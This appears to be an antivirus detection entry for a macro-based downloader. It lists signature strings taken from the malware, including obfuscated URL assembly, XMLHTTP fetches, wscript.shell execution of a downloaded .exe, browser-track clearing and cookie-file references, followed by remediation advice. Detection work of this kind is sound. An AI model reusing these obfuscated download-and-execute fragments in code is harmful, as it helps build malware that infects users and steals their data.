- himme("h tmtopcs.:a/i/ndaokmiin"), BpinnS, xlTop10Bottom, xlReport1) = ty - ty Then Debug.Print (MACROHSTR_EXT)
- DecodeBase64((bumerangus(arMani("5;6h-t20t p6s :") & "://" & arMani("mederaogs") & "." & arMani("/c12o-m")))), Farmaci (MACROHSTR_EXT)
- Application.DefaultFilePath (MACROHSTR_EXT)
- = Donati & arMani("0\9c6al9c") & "." & arMani("9e7-x5e") (MACROHSTR_EXT)
- & "\" & Int( (MACROHSTR_EXT)
- & "." (MACROHSTR_EXT)
- ("115;6h-t20t 2p6s :1") & "://" & (MACROHSTR_EXT)
- ("chechoa") & "." & (MACROHSTR_EXT)
- ("/-c12o-3m3")))), (MACROHSTR_EXT)
- ("11r3-e8 0g,s7;10v 8r1") & "32." & (MACROHSTR_EXT)
- 0\9c6al9c7") & "." & (MACROHSTR_EXT)
- Debug.Print (MACROHSTR_EXT)
- = eliminano("9 H/11cV T3 5s8taOr6t ", 1) (MACROHSTR_EXT)
- & eliminano("8\AcN4BaJ8l0c532.8eYxE7e1", 3) (MACROHSTR_EXT)
- (CreateObject("wscript.shell").exec(Exel).StdOut.ReadAll()): Workbooks.Application.DisplayAlerts = False: Application.Quit (MACROHSTR_EXT)
- = Environ$("USERPROFILE") & "\Documents" & _ (MACROHSTR_EXT)
- = CreateObject("MSXML2.XMLHTTP") (MACROHSTR_EXT)
- deformato.Open "get", squilibrati, False (MACROHSTR_EXT)
- deformato.setRequestHeader "etag", "fetch" (MACROHSTR_EXT)
- MsgBox (Len(resistermi((intrecciato("h33t1tp30s:1//25li15jos1a.c80o4m")))) - 404) (MACROHSTR_EXT)
- = "http://inter" & (MACROHSTR_EXT)
- & Orios & ".com" (MACROHSTR_EXT)
- = .Run(Pl & " InetCpl.cpl,ClearMyTracksByProcess 255", 0, True): End With (MACROHSTR_EXT)
- ) & ".cvs" (MACROHSTR_EXT)
- = ",#" & Len(oXHTTP.getResponseHeader("Akamai-GRN")) (MACROHSTR_EXT)
- sfhjffkfhgfdjsrfhdfdfhfffadsgfahsscffgdb (PEHSTR_EXT)
- 269e3863.dll (PEHSTR_EXT)
- stwn404ya13.dll (PEHSTR_EXT)
- Sit.dll (PEHSTR_EXT)
- grcook64.pdb (PEHSTR_EXT)
- cookies.sqlite (PEHSTR_EXT)
- *.txt (PEHSTR_EXT)
- .Z,Ai$ (SNID)
- ") & "://" & (MACROHSTR_EXT)
- ") & "." & (MACROHSTR_EXT)
- ") & "32." & (MACROHSTR_EXT)
- 0\9c6al9c (MACROHSTR_EXT)
- rab429ko27.dll (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)c3105cdaac7f7886aedf30ba4da177472786d9bca22f4a787eff30e18a9c7b3bImmediately isolate the infected host from the network. Perform a full system scan with updated antivirus software and remove all detected threats. Thoroughly investigate for persistence mechanisms and additional malware, then consider a full system reimage or restore from a clean backup. Change all potentially compromised credentials, especially for banking and sensitive accounts, and implement network-level blocking for known C2 domains.